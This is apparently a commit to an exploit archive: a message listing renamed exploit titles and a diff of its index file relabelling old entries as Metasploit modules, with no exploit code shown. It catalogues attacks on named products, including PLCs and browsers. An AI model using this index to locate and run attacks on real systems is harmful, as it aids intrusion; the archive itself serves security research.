Liferay XSL - Command Execution (Metasploit) CPE17 Autorun Killer <= 1.7.1 - Stack Buffer Overflow Exploit CPE17 Autorun Killer <= 1.7.1 - Stack Buffer Overflow Exploit (Metasploit) Wyse - Machine Remote Power off (DOS) without any privilege Wyse - Machine Remote Power off (DOS) without any privilege (Metasploit) TFM MMPlayer (m3u/ppl File) Buffer Overflow TFM MMPlayer (.m3u/.ppl) Buffer Overflow Apple iTunes <= 10.6.1.7 Extended m3u Stack Buffer Overflow Apple iTunes <= 10.6.1.7 Extended m3u Stack Buffer Overflow (Metasploit) WANGKONGBAO CNS-1000 UTM IPS-FW Directory Traversal WANGKONGBAO CNS-1000 UTM IPS-FW Directory Traversal (Metasploit) ALLMediaServer 0.8 SEH Overflow Exploit ALLMediaServer 0.8 - SEH Overflow Exploit Siemens Simatic S7-300/400 CPU START/STOP Module Siemens Simatic S7-300 PLC Remote Memory Viewer Siemens Simatic S7-1200 CPU START/STOP Module Siemens Simatic S7-300/400 CPU START/STOP Module (Metasploit) Siemens Simatic S7-300 PLC Remote Memory Viewer (Metasploit) Siemens Simatic S7-1200 CPU START/STOP Module (Metasploit) Sysax Multi Server 5.64 - Create Folder Buffer Overflow Sysax Multi Server 5.64 - Create Folder Buffer Overflow (Metasploit) Metasploit < 4.4 - pcap_log Plugin Privilege Escalation Exploit Metasploit < 4.4 - pcap_log Plugin Privilege Escalation Exploit (Metasploit) Jira Scriptrunner 2.0.7 - CSRF/RCE Exploit Jira Scriptrunner 2.0.7 - CSRF/RCE Exploit (Metasploit) NetWin SurgeFTP Authenticated Admin Command Injection NetWin SurgeFTP Authenticated Admin Command Injection (Metasploit) ActFax 5.01 - RAW Server Exploit ActFax 5.01 - RAW Server Exploit (Metasploit) Polycom HDX Telnet Authorization Bypass Polycom HDX Telnet Authorization Bypass (Metasploit) Microsoft Internet Explorer SLayoutRun Use-After-Free (MS13-009) Microsoft Internet Explorer SLayoutRun Use-After-Free (MS13-009) (Metasploit) Ra1NX PHP Bot - pubcall Authentication Bypass Remote Code Execution Ra1NX PHP Bot - pubcall Authentication Bypass Remote Code Execution (Metasploit) Mikrotik Syslog Server for Windows 1.15 - Denial of Service Mikrotik Syslog Server for Windows 1.15 - Denial of Service (Metasploit) SAP ConfigServlet OS Command Execution SAP ConfigServlet OS Command Execution (Metasploit) SAP ConfigServlet Remote Unauthenticated Payload Execution SAP ConfigServlet Remote Unauthenticated Payload Execution (Metasploit) Microsoft Internet Explorer textNode Use-After-Free Microsoft Internet Explorer textNode Use-After-Free (Metasploit) Java Web Start Double Quote Injection Remote Code Execution Java Web Start Double Quote Injection Remote Code Execution (Metasploit) OpenEMR 4.1.1 Patch 14 - SQLi Privilege Escalation Remote Code Execution OpenEMR 4.1.1 Patch 14 - SQLi Privilege Escalation Remote Code Execution (Metasploit) Zabbix 2.0.8 - SQL Injection / Remote Code Execution Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit) SikaBoom - Remote Buffer Overflow SikaBoom - Remote Buffer Overflow (Metasploit) Dahua DVR 2.608.0000.0 / 2.608.GV00.0 - Authentication Bypass Dahua DVR 2.608.0000.0 / 2.608.GV00.0 - Authentication Bypass (Metasploit) VUPlayer 2.49 - (.M3U) Universal Buffer Overflow (DEP Bypass) VUPlayer 2.49 - (.m3u) Universal Buffer Overflow (DEP Bypass) Netgear WNR1000v3 - Password Recovery Credential Disclosure Netgear WNR1000v3 - Password Recovery Credential Disclosure (Metasploit) Easy CD-DA Recorder - (PLS File) Buffer Overflow Easy CD-DA Recorder - (.pls) Buffer Overflow Fitnesse Wiki - Remote Command Execution Fitnesse Wiki - Remote Command Execution (Metasploit) EMC Cloud Tiering Appliance 10.0 - Unauthenticated XXE Arbitrary File Read EMC Cloud Tiering Appliance 10.0 - Unauthenticated XXE Arbitrary File Read (Metasploit) AlienVault 4.5.0 - Authenticated SQL Injection AlienVault 4.5.0 - Authenticated SQL Injection (Metasploit) Unitrends Enterprise Backup 7.3.0 - Unauthenticated Root RCE Unitrends Enterprise Backup 7.3.0 - Unauthenticated Root RCE (Metasploit) F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation (Metasploit) AlienVault OSSIM 4.6.1 - Authenticated SQL Injection AlienVault OSSIM 4.6.1 - Authenticated SQL Injection (Metasploit) Raritan PowerIQ 4.1.0 - SQL Injection Raritan PowerIQ 4.1.0 - SQL Injection (Metasploit) Mthree Development MP3 to WAV Decoder - (.mp3 File) Remote Buffer Overflow Mthree Development MP3 to WAV Decoder - (.mp3) Remote Buffer Overflow ManageEngine Password Manager MetadataServlet.dat SQL Injection ManageEngine Password Manager MetadataServlet.dat SQL Injection (Metasploit) Ammyy Admin 3.5 - RCE Ammyy Admin 3.5 - RCE (Metasploit) Microsoft Exchange IIS HTTP Internal IP Address Disclosure Microsoft Exchange IIS HTTP Internal IP Address Disclosure (Metasploit) ManageEngine OpManager / Social IT Arbitrary File Upload ManageEngine OpManager / Social IT Arbitrary File Upload (Metasploit) DotNetNuke DNNspot Store 3.0.0 - Arbitrary File Upload DotNetNuke DNNspot Store 3.0.0 - Arbitrary File Upload (Metasploit) Device42 WAN Emulator 2.3 - Traceroute Command Injection Device42 WAN Emulator 2.3 - Ping Command Injection Device42 WAN Emulator 2.3 - Traceroute Command Injection (Metasploit) Device42 WAN Emulator 2.3 - Ping Command Injection (Metasploit) Microsoft Windows Media Player 11.0.5721.5145 - (.avi File) Buffer Overflow Microsoft Windows Media Player 11.0.5721.5145 - (.avi) Buffer Overflow Varnish Cache CLI Interface - Remote Code Execution Varnish Cache CLI Interface - Remote Code Execution (Metasploit) Lotus Mail Encryption Server (Protector for Mail) - LFI to RCE Lotus Mail Encryption Server (Protector for Mail) - LFI to RCE (Metasploit) OpenMyZip 0.1 - (.zip File) Buffer Overflow OpenMyZip 0.1 - (.zip) Buffer Overflow Persistent Systems Client Automation - Command Injection RCE Persistent Systems Client Automation - Command Injection RCE (Metasploit) Metasploit Project < 4.11.1 - Initial User Creation CSRF Metasploit Project < 4.11.1 - Initial User Creation CSRF (Metasploit) Exim GHOST (glibc gethostbyname) Buffer Overflow Exim GHOST (glibc gethostbyname) Buffer Overflow (Metasploit) QNAP - Admin Shell via Bash Environment Variable Code Injection QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection QNAP - Admin Shell via Bash Environment Variable Code Injection (Metasploit) QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection (Metasploit) WordPress Business Intelligence Plugin - SQL injection WordPress Business Intelligence Plugin - SQL injection (Metasploit) Barracuda Firmware <= 5.0.0.012 - Post Auth Remote Root exploit Barracuda Firmware <= 5.0.0.012 - Post Auth Remote Root exploit (Metasploit) PDF Shaper 3.5 - Buffer Overflow PDF Shaper 3.5 - Buffer Overflow (Metasploit) Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection (Metasploit) Centreon <= 2.5.3 - Remote Command Execution Centreon 2.5.3 - Remote Command Execution Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure (Metasploit) Meteocontrol WEB’log - Admin Password Disclosure Meteocontrol WEB’log - Admin Password Disclosure (Metasploit) VUPlayer 2.49 - .m3u Buffer Overflow Exploit (Win 7 DEP Bypass) VUPlayer 2.49 - (.m3u) Buffer Overflow Exploit (Win 7 DEP Bypass) VMWare - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010) Centreon 2.5.3 - Web Useralias Command Execution (Metasploit) --- files.csv | 574 ++++++++++++++++--------------- platforms/linux/local/40169.txt | 57 +++ platforms/python/remote/40170.rb | 89 +++++ 3 files changed, 434 insertions(+), 286 deletions(-) create mode 100755 platforms/linux/local/40169.txt create mode 100755 platforms/python/remote/40170.rb diff --git a/files.csv b/files.csv index 6863aeff1..e6729db76 100755 --- a/files.csv +++ b/files.csv @@ -484,7 +484,7 @@ id,file,description,date,author,platform,type,port 626,platforms/windows/dos/626.c,"Kerio Personal Firewall <= 4.1.1 - Multiple IP Options DoS Exploit",2004-11-12,houseofdabus,windows,dos,0 627,platforms/windows/remote/627.pl,"IPSwitch IMail 8.13 - (DELETE) Remote Stack Overflow Exploit",2004-11-12,Zatlander,windows,remote,143 628,platforms/windows/dos/628.c,"NetNote Server <= 2.2 build 230 - Crafted String DoS Exploit",2004-11-13,class101,windows,dos,0 -629,platforms/multiple/local/629.c,"Multiple AntiVirus (zip file) Detection Bypass Exploit",2004-11-14,oc192,multiple,local,0 +629,platforms/multiple/local/629.c,"Multiple AntiVirus - .zip Detection Bypass Exploit",2004-11-14,oc192,multiple,local,0 630,platforms/php/webapps/630.pl,"UBB.threads 6.2.x < 6.3x - One Char Bruteforce Exploit",2004-11-15,RusH,php,webapps,0 631,platforms/php/webapps/631.txt,"vBulletin LAST.php SQL Injection",2004-11-15,anonymous,php,webapps,0 634,platforms/windows/dos/634.pl,"Secure Network Messenger <= 1.4.2 - Denial of Service Exploit",2004-11-15,ClearScreen,windows,dos,0 @@ -683,7 +683,7 @@ id,file,description,date,author,platform,type,port 860,platforms/php/webapps/860.c,"Aztek Forum <= 4.0 - (myadmin.php) Database Dumper Exploit",2005-03-07,sirius_black,php,webapps,0 861,platforms/windows/dos/861.c,"Microsoft Windows 2003/XP - Remote Denial of Service Exploit",2005-03-07,RusH,windows,dos,0 862,platforms/cgi/webapps/862.txt,"The Includer CGI <= 1.0 - Remote Command Execution",2005-03-07,"Francisco Alisson",cgi,webapps,0 -863,platforms/windows/local/863.cpp,"RealPlayer 10 - (.smil File) Local Buffer Overflow Exploit",2005-03-07,nolimit,windows,local,0 +863,platforms/windows/local/863.cpp,"RealPlayer 10 - (.smil) Local Buffer Overflow Exploit",2005-03-07,nolimit,windows,local,0 864,platforms/php/webapps/864.txt,"phpWebLog <= 0.5.3 - Arbitrary File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0 865,platforms/php/webapps/865.txt,"PHP mcNews <= 1.3 - (skinfile) Remote File Include",2005-03-07,"Filip Groszynski",php,webapps,0 866,platforms/php/webapps/866.c,"paNews 2.0b4 - Remote Admin Creation SQL Injection Exploit",2005-03-08,Silentium,php,webapps,0 @@ -949,11 +949,11 @@ id,file,description,date,author,platform,type,port 1144,platforms/windows/remote/1144.html,"Microsoft Internet Explorer (blnmgr.dll) COM Object Remote Exploit (MS05-038)",2005-08-09,FrSIRT,windows,remote,0 1145,platforms/php/webapps/1145.pm,"WordPress <= 1.5.1.3 - Remote Code Execution exploit (Metasploit)",2005-08-10,str0ke,php,webapps,0 1146,platforms/windows/remote/1146.c,"Microsoft Windows Plug-and-Play Service Remote Overflow (MS05-039)",2005-08-11,sl0ppy,windows,remote,139 -1147,platforms/windows/remote/1147.pm,"Veritas Backup Exec - Remote File Access Exploit (Windows)",2005-08-11,anonymous,windows,remote,10000 +1147,platforms/windows/remote/1147.pm,"Veritas Backup Exec - Remote File Access Exploit (Windows) (Metasploit)",2005-08-11,anonymous,windows,remote,10000 1149,platforms/windows/remote/1149.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (MS05-039)",2005-08-12,houseofdabus,windows,remote,445 -1150,platforms/windows/remote/1150.pm,"ZENworks 6.5 Desktop/Server Management Remote Stack Overflow",2005-08-12,anonymous,windows,remote,1761 -1151,platforms/windows/remote/1151.pm,"MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow Exploit",2005-08-12,anonymous,windows,remote,143 -1152,platforms/windows/remote/1152.pm,"Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow",2005-08-12,anonymous,windows,remote,8008 +1150,platforms/windows/remote/1150.pm,"ZENworks 6.5 Desktop/Server Management - Remote Stack Overflow (Metasploit)",2005-08-12,anonymous,windows,remote,1761 +1151,platforms/windows/remote/1151.pm,"MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow Exploit (Metasploit)",2005-08-12,anonymous,windows,remote,143 +1152,platforms/windows/remote/1152.pm,"Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow (Metasploit)",2005-08-12,anonymous,windows,remote,8008 1153,platforms/hardware/dos/1153.pl,"Grandstream Budge Tone 101/102 VOIP Phone Denial of Service Exploit",2005-08-12,"Pierre Kroma",hardware,dos,0 1154,platforms/linux/local/1154.pl,"Operator Shell (osh) 1.7-13 - Local Root Exploit",2005-08-16,"Charles Stevenson",linux,local,0 1156,platforms/windows/dos/1156.c,"Chris Moneymakers World Poker Championship 1.0 DoS Exploit",2005-08-17,"Luigi Auriemma",windows,dos,0 @@ -1004,7 +1004,7 @@ id,file,description,date,author,platform,type,port 1207,platforms/php/webapps/1207.php,"Class-1 Forum <= 0.24.4 - Remote Code Execution Exploit",2005-09-09,rgod,php,webapps,0 1208,platforms/php/webapps/1208.pl,"phpMyFamily <= 1.4.0 - SQL Injection Exploit",2005-03-27,basher13,php,webapps,0 1209,platforms/linux/remote/1209.c,"GNU Mailutils imap4d 0.6 - (search) Remote Format String Exploit",2005-09-10,"Clément Lecigne",linux,remote,143 -1210,platforms/windows/remote/1210.pm,"WebAdmin <= 2.0.4 - USER Buffer Overflow Exploit",2005-09-11,y0,windows,remote,1000 +1210,platforms/windows/remote/1210.pm,"WebAdmin <= 2.0.4 - USER Buffer Overflow Exploit (Metasploit)",2005-09-11,y0,windows,remote,1000 1211,platforms/php/webapps/1211.pl,"PhpTagCool <= 1.0.3 - SQL Injection Attacks Exploit",2005-09-11,Megabyte,php,webapps,0 1212,platforms/windows/dos/1212.pl,"COOL! Remote Control <= 1.12 - Remote Denial of Service Exploit",2005-09-11,basher13,windows,dos,0 1213,platforms/multiple/dos/1213.c,"Snort <= 2.4.0 SACK TCP Option Error Handling Denial of Service Exploit",2005-09-12,nitr0us,multiple,dos,0 @@ -1045,7 +1045,7 @@ id,file,description,date,author,platform,type,port 1251,platforms/windows/dos/1251.pl,"TYPSoft FTP Server <= 1.11 - (RETR) Denial of Service",2005-10-14,wood,windows,dos,0 1252,platforms/asp/webapps/1252.htm,"MuOnline Loopholes Web Server (pkok.asp) SQL Injection Exploit",2005-10-15,nukedx,asp,webapps,0 1253,platforms/multiple/dos/1253.html,"Mozilla (Firefox <= 1.0.7) (Thunderbird <= 1.0.6) Denial of Service Exploit",2005-10-16,posidron,multiple,dos,0 -1254,platforms/multiple/dos/1254.html,"Opera <= 8.02 - Remote Denial of Service Exploit",2005-10-16,posidron,multiple,dos,0 +1254,platforms/multiple/dos/1254.html,"Opera <= 8.02 - Remote Denial of Service Exploit (1)",2005-10-16,posidron,multiple,dos,0 1255,platforms/windows/dos/1255.html,"Opera <= 8.02 - Remote Denial of Service Exploit (2)",2005-10-16,posidron,windows,dos,0 1256,platforms/multiple/dos/1256.pl,"Lynx <= 2.8.6dev.13 - Remote Buffer Overflow Exploit (PoC)",2005-10-17,"Ulf Harnhammar",multiple,dos,0 1257,platforms/multiple/dos/1257.html,"Mozilla (Firefox <= 1.0.7) (Mozilla <= 1.7.12) Denial of Service Exploit",2005-10-17,Kubbo,multiple,dos,0 @@ -1109,8 +1109,8 @@ id,file,description,date,author,platform,type,port 1329,platforms/php/webapps/1329.php,"EkinBoard 1.0.3 - (config.php) SQL Injection / Command Execution Exploit",2005-11-17,rgod,php,webapps,0 1330,platforms/windows/remote/1330.c,"FreeFTPD <= 1.0.8 - (USER) Remote Buffer Overflow Exploit",2005-11-17,Expanders,windows,remote,21 1331,platforms/multiple/dos/1331.c,"Macromedia Flash Plugin <= 7.0.19.0 - (Action) Denial of Service Exploit",2005-11-18,BassReFLeX,multiple,dos,0 -1332,platforms/windows/remote/1332.pm,"MailEnable 1.54 Pro - Universal IMAPD W3C Logging BoF Exploit",2005-11-20,y0,windows,remote,143 -1333,platforms/hardware/remote/1333.pm,"Google Search Appliance - proxystylesheet XSLT Java Code Execution",2005-11-20,"H D Moore",hardware,remote,80 +1332,platforms/windows/remote/1332.pm,"MailEnable 1.54 Pro - Universal IMAPD W3C Logging BoF Exploit (Metasploit)",2005-11-20,y0,windows,remote,143 +1333,platforms/hardware/remote/1333.pm,"Google Search Appliance - proxystylesheet XSLT Java Code Execution (Metasploit)",2005-11-20,"H D Moore",hardware,remote,80 1336,platforms/windows/dos/1336.cpp,"FileZilla Server Terminal 0.9.4d - Buffer Overflow PoC",2005-11-21,"Inge Henriksen",windows,dos,0 1337,platforms/php/webapps/1337.php,"Mambo <= 4.5.2 Globals Overwrite / Remote Command Exection Exploit",2005-11-22,rgod,php,webapps,0 1338,platforms/hardware/dos/1338.pl,"Cisco PIX Spoofed TCP SYN Packets Remote Denial of Service Exploit",2005-11-23,"Janis Vizulis",hardware,dos,0 @@ -1135,8 +1135,8 @@ id,file,description,date,author,platform,type,port 1362,platforms/windows/dos/1362.html,"Mozilla Firefox <= 1.5 - (history.dat) Looping PoC",2005-12-07,ZIPLOCK,windows,dos,0 1363,platforms/php/webapps/1363.php,"Website Baker <= 2.6.0 Login Bypass / Remote Code Execution Exploit",2005-12-08,rgod,php,webapps,0 1364,platforms/php/webapps/1364.c,"SugarSuite Open Source <= 4.0beta - Remote Code Execution Exploit",2005-12-08,pointslash,php,webapps,0 -1365,platforms/windows/remote/1365.pm,"Oracle 9.2.0.1 - Universal XDB HTTP Pass Overflow Exploit",2005-12-08,y0,windows,remote,8080 -1366,platforms/windows/remote/1366.pm,"Lyris ListManager - Read Message Attachment SQL Injection Exploit",2005-12-09,"H D Moore",windows,remote,0 +1365,platforms/windows/remote/1365.pm,"Oracle 9.2.0.1 - Universal XDB HTTP Pass Overflow Exploit (Metasploit)",2005-12-08,y0,windows,remote,8080 +1366,platforms/windows/remote/1366.pm,"Lyris ListManager - Read Message Attachment SQL Injection Exploit (Metasploit)",2005-12-09,"H D Moore",windows,remote,0 1367,platforms/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution Exploit",2005-12-10,rgod,php,webapps,0 1368,platforms/windows/dos/1368.cpp,"Counter Strike 2D <= 0.1.0.1 - Denial of Service",2005-12-11,"Iman Karim",windows,dos,0 1369,platforms/multiple/remote/1369.html,"Mozilla Firefox <= 1.04 compareTo() Remote Code Execution Exploit",2005-12-12,"Aviv Raff",multiple,remote,0 @@ -1219,11 +1219,11 @@ id,file,description,date,author,platform,type,port 1471,platforms/cgi/webapps/1471.pl,"MyQuiz 1.01 - (PATH_INFO) Arbitrary Command Execution Exploit",2006-02-06,Hessam-x,cgi,webapps,0 1472,platforms/asp/webapps/1472.pl,"ASPThai.Net Guestbook <= 5.5 - (Auth Bypass) SQL Injection Exploit",2006-02-06,Zodiac,asp,webapps,0 1473,platforms/hardware/dos/1473.c,"Sony/Ericsson Bluetooth (Reset Display) Denial of Service Exploit",2006-02-06,"Pierre Betouin",hardware,dos,0 -1474,platforms/linux/remote/1474.pm,"Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (Linux)",2006-02-07,"H D Moore",linux,remote,0 +1474,platforms/linux/remote/1474.pm,"Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (Linux) (Metasploit)",2006-02-07,"H D Moore",linux,remote,0 1475,platforms/windows/dos/1475.html,"Microsoft Internet Explorer 7.0 Beta 2 - (urlmon.dll) Denial of Service",2006-02-07,"Tom Ferris",windows,dos,0 1478,platforms/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 1479,platforms/qnx/local/1479.sh,"QNX Neutrino 6.2.1 - (phfont) Race Condition Local Root Exploit",2006-02-08,kokanin,qnx,local,0 -1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (OSX)",2006-02-08,"H D Moore",osx,remote,0 +1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (OSX) (Metasploit)",2006-02-08,"H D Moore",osx,remote,0 1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 Insecure rc.local Permissions Plus System Crash Exploit",2006-02-08,kokanin,qnx,local,0 1482,platforms/php/webapps/1482.php,"SPIP <= 1.8.2g Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server <= 1.6 (Non Steam) - Denial of Service Exploit",2006-02-11,Firestorm,multiple,dos,0 @@ -1260,7 +1260,7 @@ id,file,description,date,author,platform,type,port 1516,platforms/php/webapps/1516.php,"ilchClan <= 1.05g (tid) Remote SQL Injection Exploit",2006-02-20,x128,php,webapps,0 1517,platforms/php/dos/1517.c,"PunBB <= 2.0.10 - (Register Multiple Users) Denial of Service Exploit",2006-02-20,K4P0,php,dos,0 1518,platforms/linux/local/1518.c,"MySQL 4.x/5.0 - User-Defined Function (UDF) Local Privilege Escalation Exploit (Linux)",2006-02-20,"Marco Ivaldi",linux,local,0 -1519,platforms/osx/remote/1519.pm,"Mac OS X Safari Browser - (Safe File) Remote Code Execution Exploit",2006-02-22,"H D Moore",osx,remote,0 +1519,platforms/osx/remote/1519.pm,"Mac OS X Safari Browser - (Safe File) Remote Code Execution Exploit (Metasploit)",2006-02-22,"H D Moore",osx,remote,0 1520,platforms/windows/remote/1520.pl,"Microsoft Windows Media Player - Plugin Overflow Exploit (MS06-006) (3)",2006-02-22,"Matthew Murphy",windows,remote,0 1521,platforms/php/webapps/1521.php,"Noahs Classifieds <= 1.3 - (lowerTemplate) Remote Code Execution",2006-02-22,trueend5,php,webapps,0 1522,platforms/php/webapps/1522.php,"NOCC Webmail <= 1.0 - (Local Inclusion) Remote Code Execution Exploit",2006-02-23,rgod,php,webapps,0 @@ -1277,8 +1277,8 @@ id,file,description,date,author,platform,type,port 1533,platforms/php/webapps/1533.php,"4Images <= 1.7.1 - (Local Inclusion) Remote Code Execution Exploit",2006-02-26,rgod,php,webapps,0 1534,platforms/sco/local/1534.c,"SCO Unixware 7.1.3 - (ptrace) Local Privilege Escalation Exploit",2006-02-26,prdelka,sco,local,0 1535,platforms/windows/dos/1535.c,"CrossFire <= 1.8.0 - (oldsocketmode) Remote Buffer Overflow PoC",2006-02-27,"Luigi Auriemma",windows,dos,0 -1536,platforms/windows/remote/1536.pm,"Microsoft Internet Explorer 6.0 SP0 - IsComponentInstalled() Remote Exploit",2006-02-28,"H D Moore",windows,remote,0 -1537,platforms/windows/remote/1537.pm,"Kerio Personal Firewall <= 2.1.4 - Remote Authentication Packet Overflow",2006-02-28,y0,windows,remote,44334 +1536,platforms/windows/remote/1536.pm,"Microsoft Internet Explorer 6.0 SP0 - IsComponentInstalled() Remote Exploit (Metasploit)",2006-02-28,"H D Moore",windows,remote,0 +1537,platforms/windows/remote/1537.pm,"Kerio Personal Firewall <= 2.1.4 - Remote Authentication Packet Overflow (Metasploit)",2006-02-28,y0,windows,remote,44334 1538,platforms/php/webapps/1538.pl,"farsinews <= 2.5 - Directory Traversal arbitrary (users.db) access Exploit",2006-02-28,Hessam-x,php,webapps,0 1539,platforms/php/webapps/1539.txt,"MyBulletinBoard (MyBB) <= 1.03 - (misc.php COMMA) SQL Injection",2006-02-28,Devil-00,php,webapps,0 1540,platforms/bsd/dos/1540.pl,"FreeBSD 6.0 - (nfsd) Remote Kernel Panic Denial of Service Exploit",2006-02-28,"Evgeny Legerov",bsd,dos,0 @@ -1296,7 +1296,7 @@ id,file,description,date,author,platform,type,port 1552,platforms/windows/dos/1552.pl,"XM Easy Personal FTP Server 1.0 - (Port) Remote Overflow PoC",2006-03-04,luka.research,windows,dos,0 1553,platforms/php/webapps/1553.pl,"Fantastic News <= 2.1.2 - (script_path) Remote Code Execution Exploit",2006-03-04,uid0,php,webapps,0 1554,platforms/multiple/local/1554.c,"LibTiff 3.7.1 - (BitsPerSample Tag) Local Buffer Overflow Exploit",2006-03-05,"Agustin Gianni",multiple,local,0 -1555,platforms/windows/local/1555.c,"Microsoft Visual Studio 6.0 sp6 - (Malformed .dbp File) Buffer Overflow Exploit",2006-03-05,Kozan,windows,local,0 +1555,platforms/windows/local/1555.c,"Microsoft Visual Studio 6.0 sp6 - (.dbp) Buffer Overflow Exploit",2006-03-05,Kozan,windows,local,0 1556,platforms/php/webapps/1556.pl,"D2-Shoutbox 4.2 IPB Mod (load) Remote SQL Injection Exploit",2006-03-06,SkOd,php,webapps,0 1557,platforms/windows/dos/1557.c,"Freeciv <= 2.0.7 - (Jumbo Malloc) Denial of Service Crash",2006-03-06,"Luigi Auriemma",windows,dos,0 1558,platforms/windows/dos/1558.c,"LieroX <= 0.62b Remote Server/Client Denial of Service Exploit",2006-03-06,"Luigi Auriemma",windows,dos,0 @@ -1408,9 +1408,9 @@ id,file,description,date,author,platform,type,port 1674,platforms/php/webapps/1674.txt,"osCommerce <= 2.2 - (extras) Source Code Disclosure",2006-04-14,rgod,php,webapps,0 1677,platforms/cgi/webapps/1677.php,"SysInfo 1.21 - (sysinfo.cgi) Remote Command Execution Exploit",2006-04-14,rgod,cgi,webapps,0 1678,platforms/php/webapps/1678.php,"PHP Album <= 0.3.2.3 - Remote Command Execution Exploit",2006-04-15,rgod,php,webapps,0 -1679,platforms/novell/remote/1679.pm,"Novell Messenger Server 2.0 - (Accept-Language) Remote Overflow Exploit",2006-04-15,"H D Moore",novell,remote,8300 -1680,platforms/cgi/webapps/1680.pm,"Symantec Sygate Management Server - (login) SQL Injection Exploit",2006-04-15,Nicob,cgi,webapps,0 -1681,platforms/windows/remote/1681.pm,"Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow Exploit",2006-04-15,anonymous,windows,remote,8080 +1679,platforms/novell/remote/1679.pm,"Novell Messenger Server 2.0 - (Accept-Language) Remote Overflow Exploit (Metasploit)",2006-04-15,"H D Moore",novell,remote,8300 +1680,platforms/cgi/webapps/1680.pm,"Symantec Sygate Management Server - (login) SQL Injection Exploit (Metasploit)",2006-04-15,Nicob,cgi,webapps,0 +1681,platforms/windows/remote/1681.pm,"Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow Exploit (Metasploit)",2006-04-15,anonymous,windows,remote,8080 1682,platforms/php/webapps/1682.php,"Fuju News 1.0 - Authentication Bypass / Remote SQL Injection Exploit",2006-04-16,snatcher,php,webapps,0 1683,platforms/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - Remote SQL Injection Exploit",2006-04-16,snatcher,php,webapps,0 1686,platforms/php/webapps/1686.pl,"FlexBB <= 0.5.5 - (/inc/start.php _COOKIE) Remote SQL ByPass Exploit",2006-04-17,Devil-00,php,webapps,0 @@ -1648,7 +1648,7 @@ id,file,description,date,author,platform,type,port 1937,platforms/multiple/dos/1937.html,"Opera 9 - (long href) Remote Denial of Service Exploit",2006-06-21,N9,multiple,dos,0 1938,platforms/php/webapps/1938.pl,"DataLife Engine <= 4.1 - Remote SQL Injection Exploit (perl)",2006-06-21,RusH,php,webapps,0 1939,platforms/php/webapps/1939.php,"DataLife Engine <= 4.1 - Remote SQL Injection Exploit (PHP)",2006-06-21,RusH,php,webapps,0 -1940,platforms/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow Exploit (MS06-025)",2006-06-22,"H D Moore",windows,remote,445 +1940,platforms/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow Exploit (MS06-025) (Metasploit)",2006-06-22,"H D Moore",windows,remote,445 1941,platforms/php/webapps/1941.php,"Mambo <= 4.6rc1 - (Weblinks) Remote Blind SQL Injection Exploit (2)",2006-06-22,rgod,php,webapps,0 1942,platforms/php/webapps/1942.txt,"ralf image gallery <= 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,php,webapps,0 1943,platforms/php/webapps/1943.txt,"Harpia CMS <= 1.0.5 - Remote File Include Vulnerabilities",2006-06-22,Kw3[R]Ln,php,webapps,0 @@ -1673,7 +1673,7 @@ id,file,description,date,author,platform,type,port 1962,platforms/osx/local/1962.pl,"Mac OS X <= 10.4.6 - (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0 1963,platforms/php/webapps/1963.txt,"GeekLog <= 1.4.0sr3 - (_CONF[path]) Remote File Include Vulnerabilities",2006-06-29,Kw3[R]Ln,php,webapps,0 1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0 -1965,platforms/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)",2006-06-29,Pusscat,windows,remote,445 +1965,platforms/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025) (Metasploit)",2006-06-29,Pusscat,windows,remote,445 1967,platforms/windows/dos/1967.c,"Microsoft Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit",2006-06-30,Preddy,windows,dos,0 1968,platforms/php/webapps/1968.php,"DZCP (deV!L_z Clanportal) <= 1.34 - (id) Remote SQL Injection Exploit",2006-07-01,x128,php,webapps,0 1969,platforms/php/webapps/1969.txt,"Stud.IP <= 1.3.0-2 - Multiple Remote File Include Vulnerabilities",2006-07-01,"Hamid Ebadi",php,webapps,0 @@ -1772,8 +1772,8 @@ id,file,description,date,author,platform,type,port 2071,platforms/php/webapps/2071.php,"Etomite CMS <= 0.6.1 - (username) SQL Injection Exploit (mq = off)",2006-07-25,rgod,php,webapps,0 2072,platforms/php/webapps/2072.php,"Etomite CMS <= 0.6.1 - (rfiles.php) Remote Command Execution Exploit",2006-07-25,rgod,php,webapps,0 2073,platforms/multiple/dos/2073.c,"libmikmod <= 3.2.2 - (GT2 loader) Local Heap Overflow PoC",2006-07-25,"Luigi 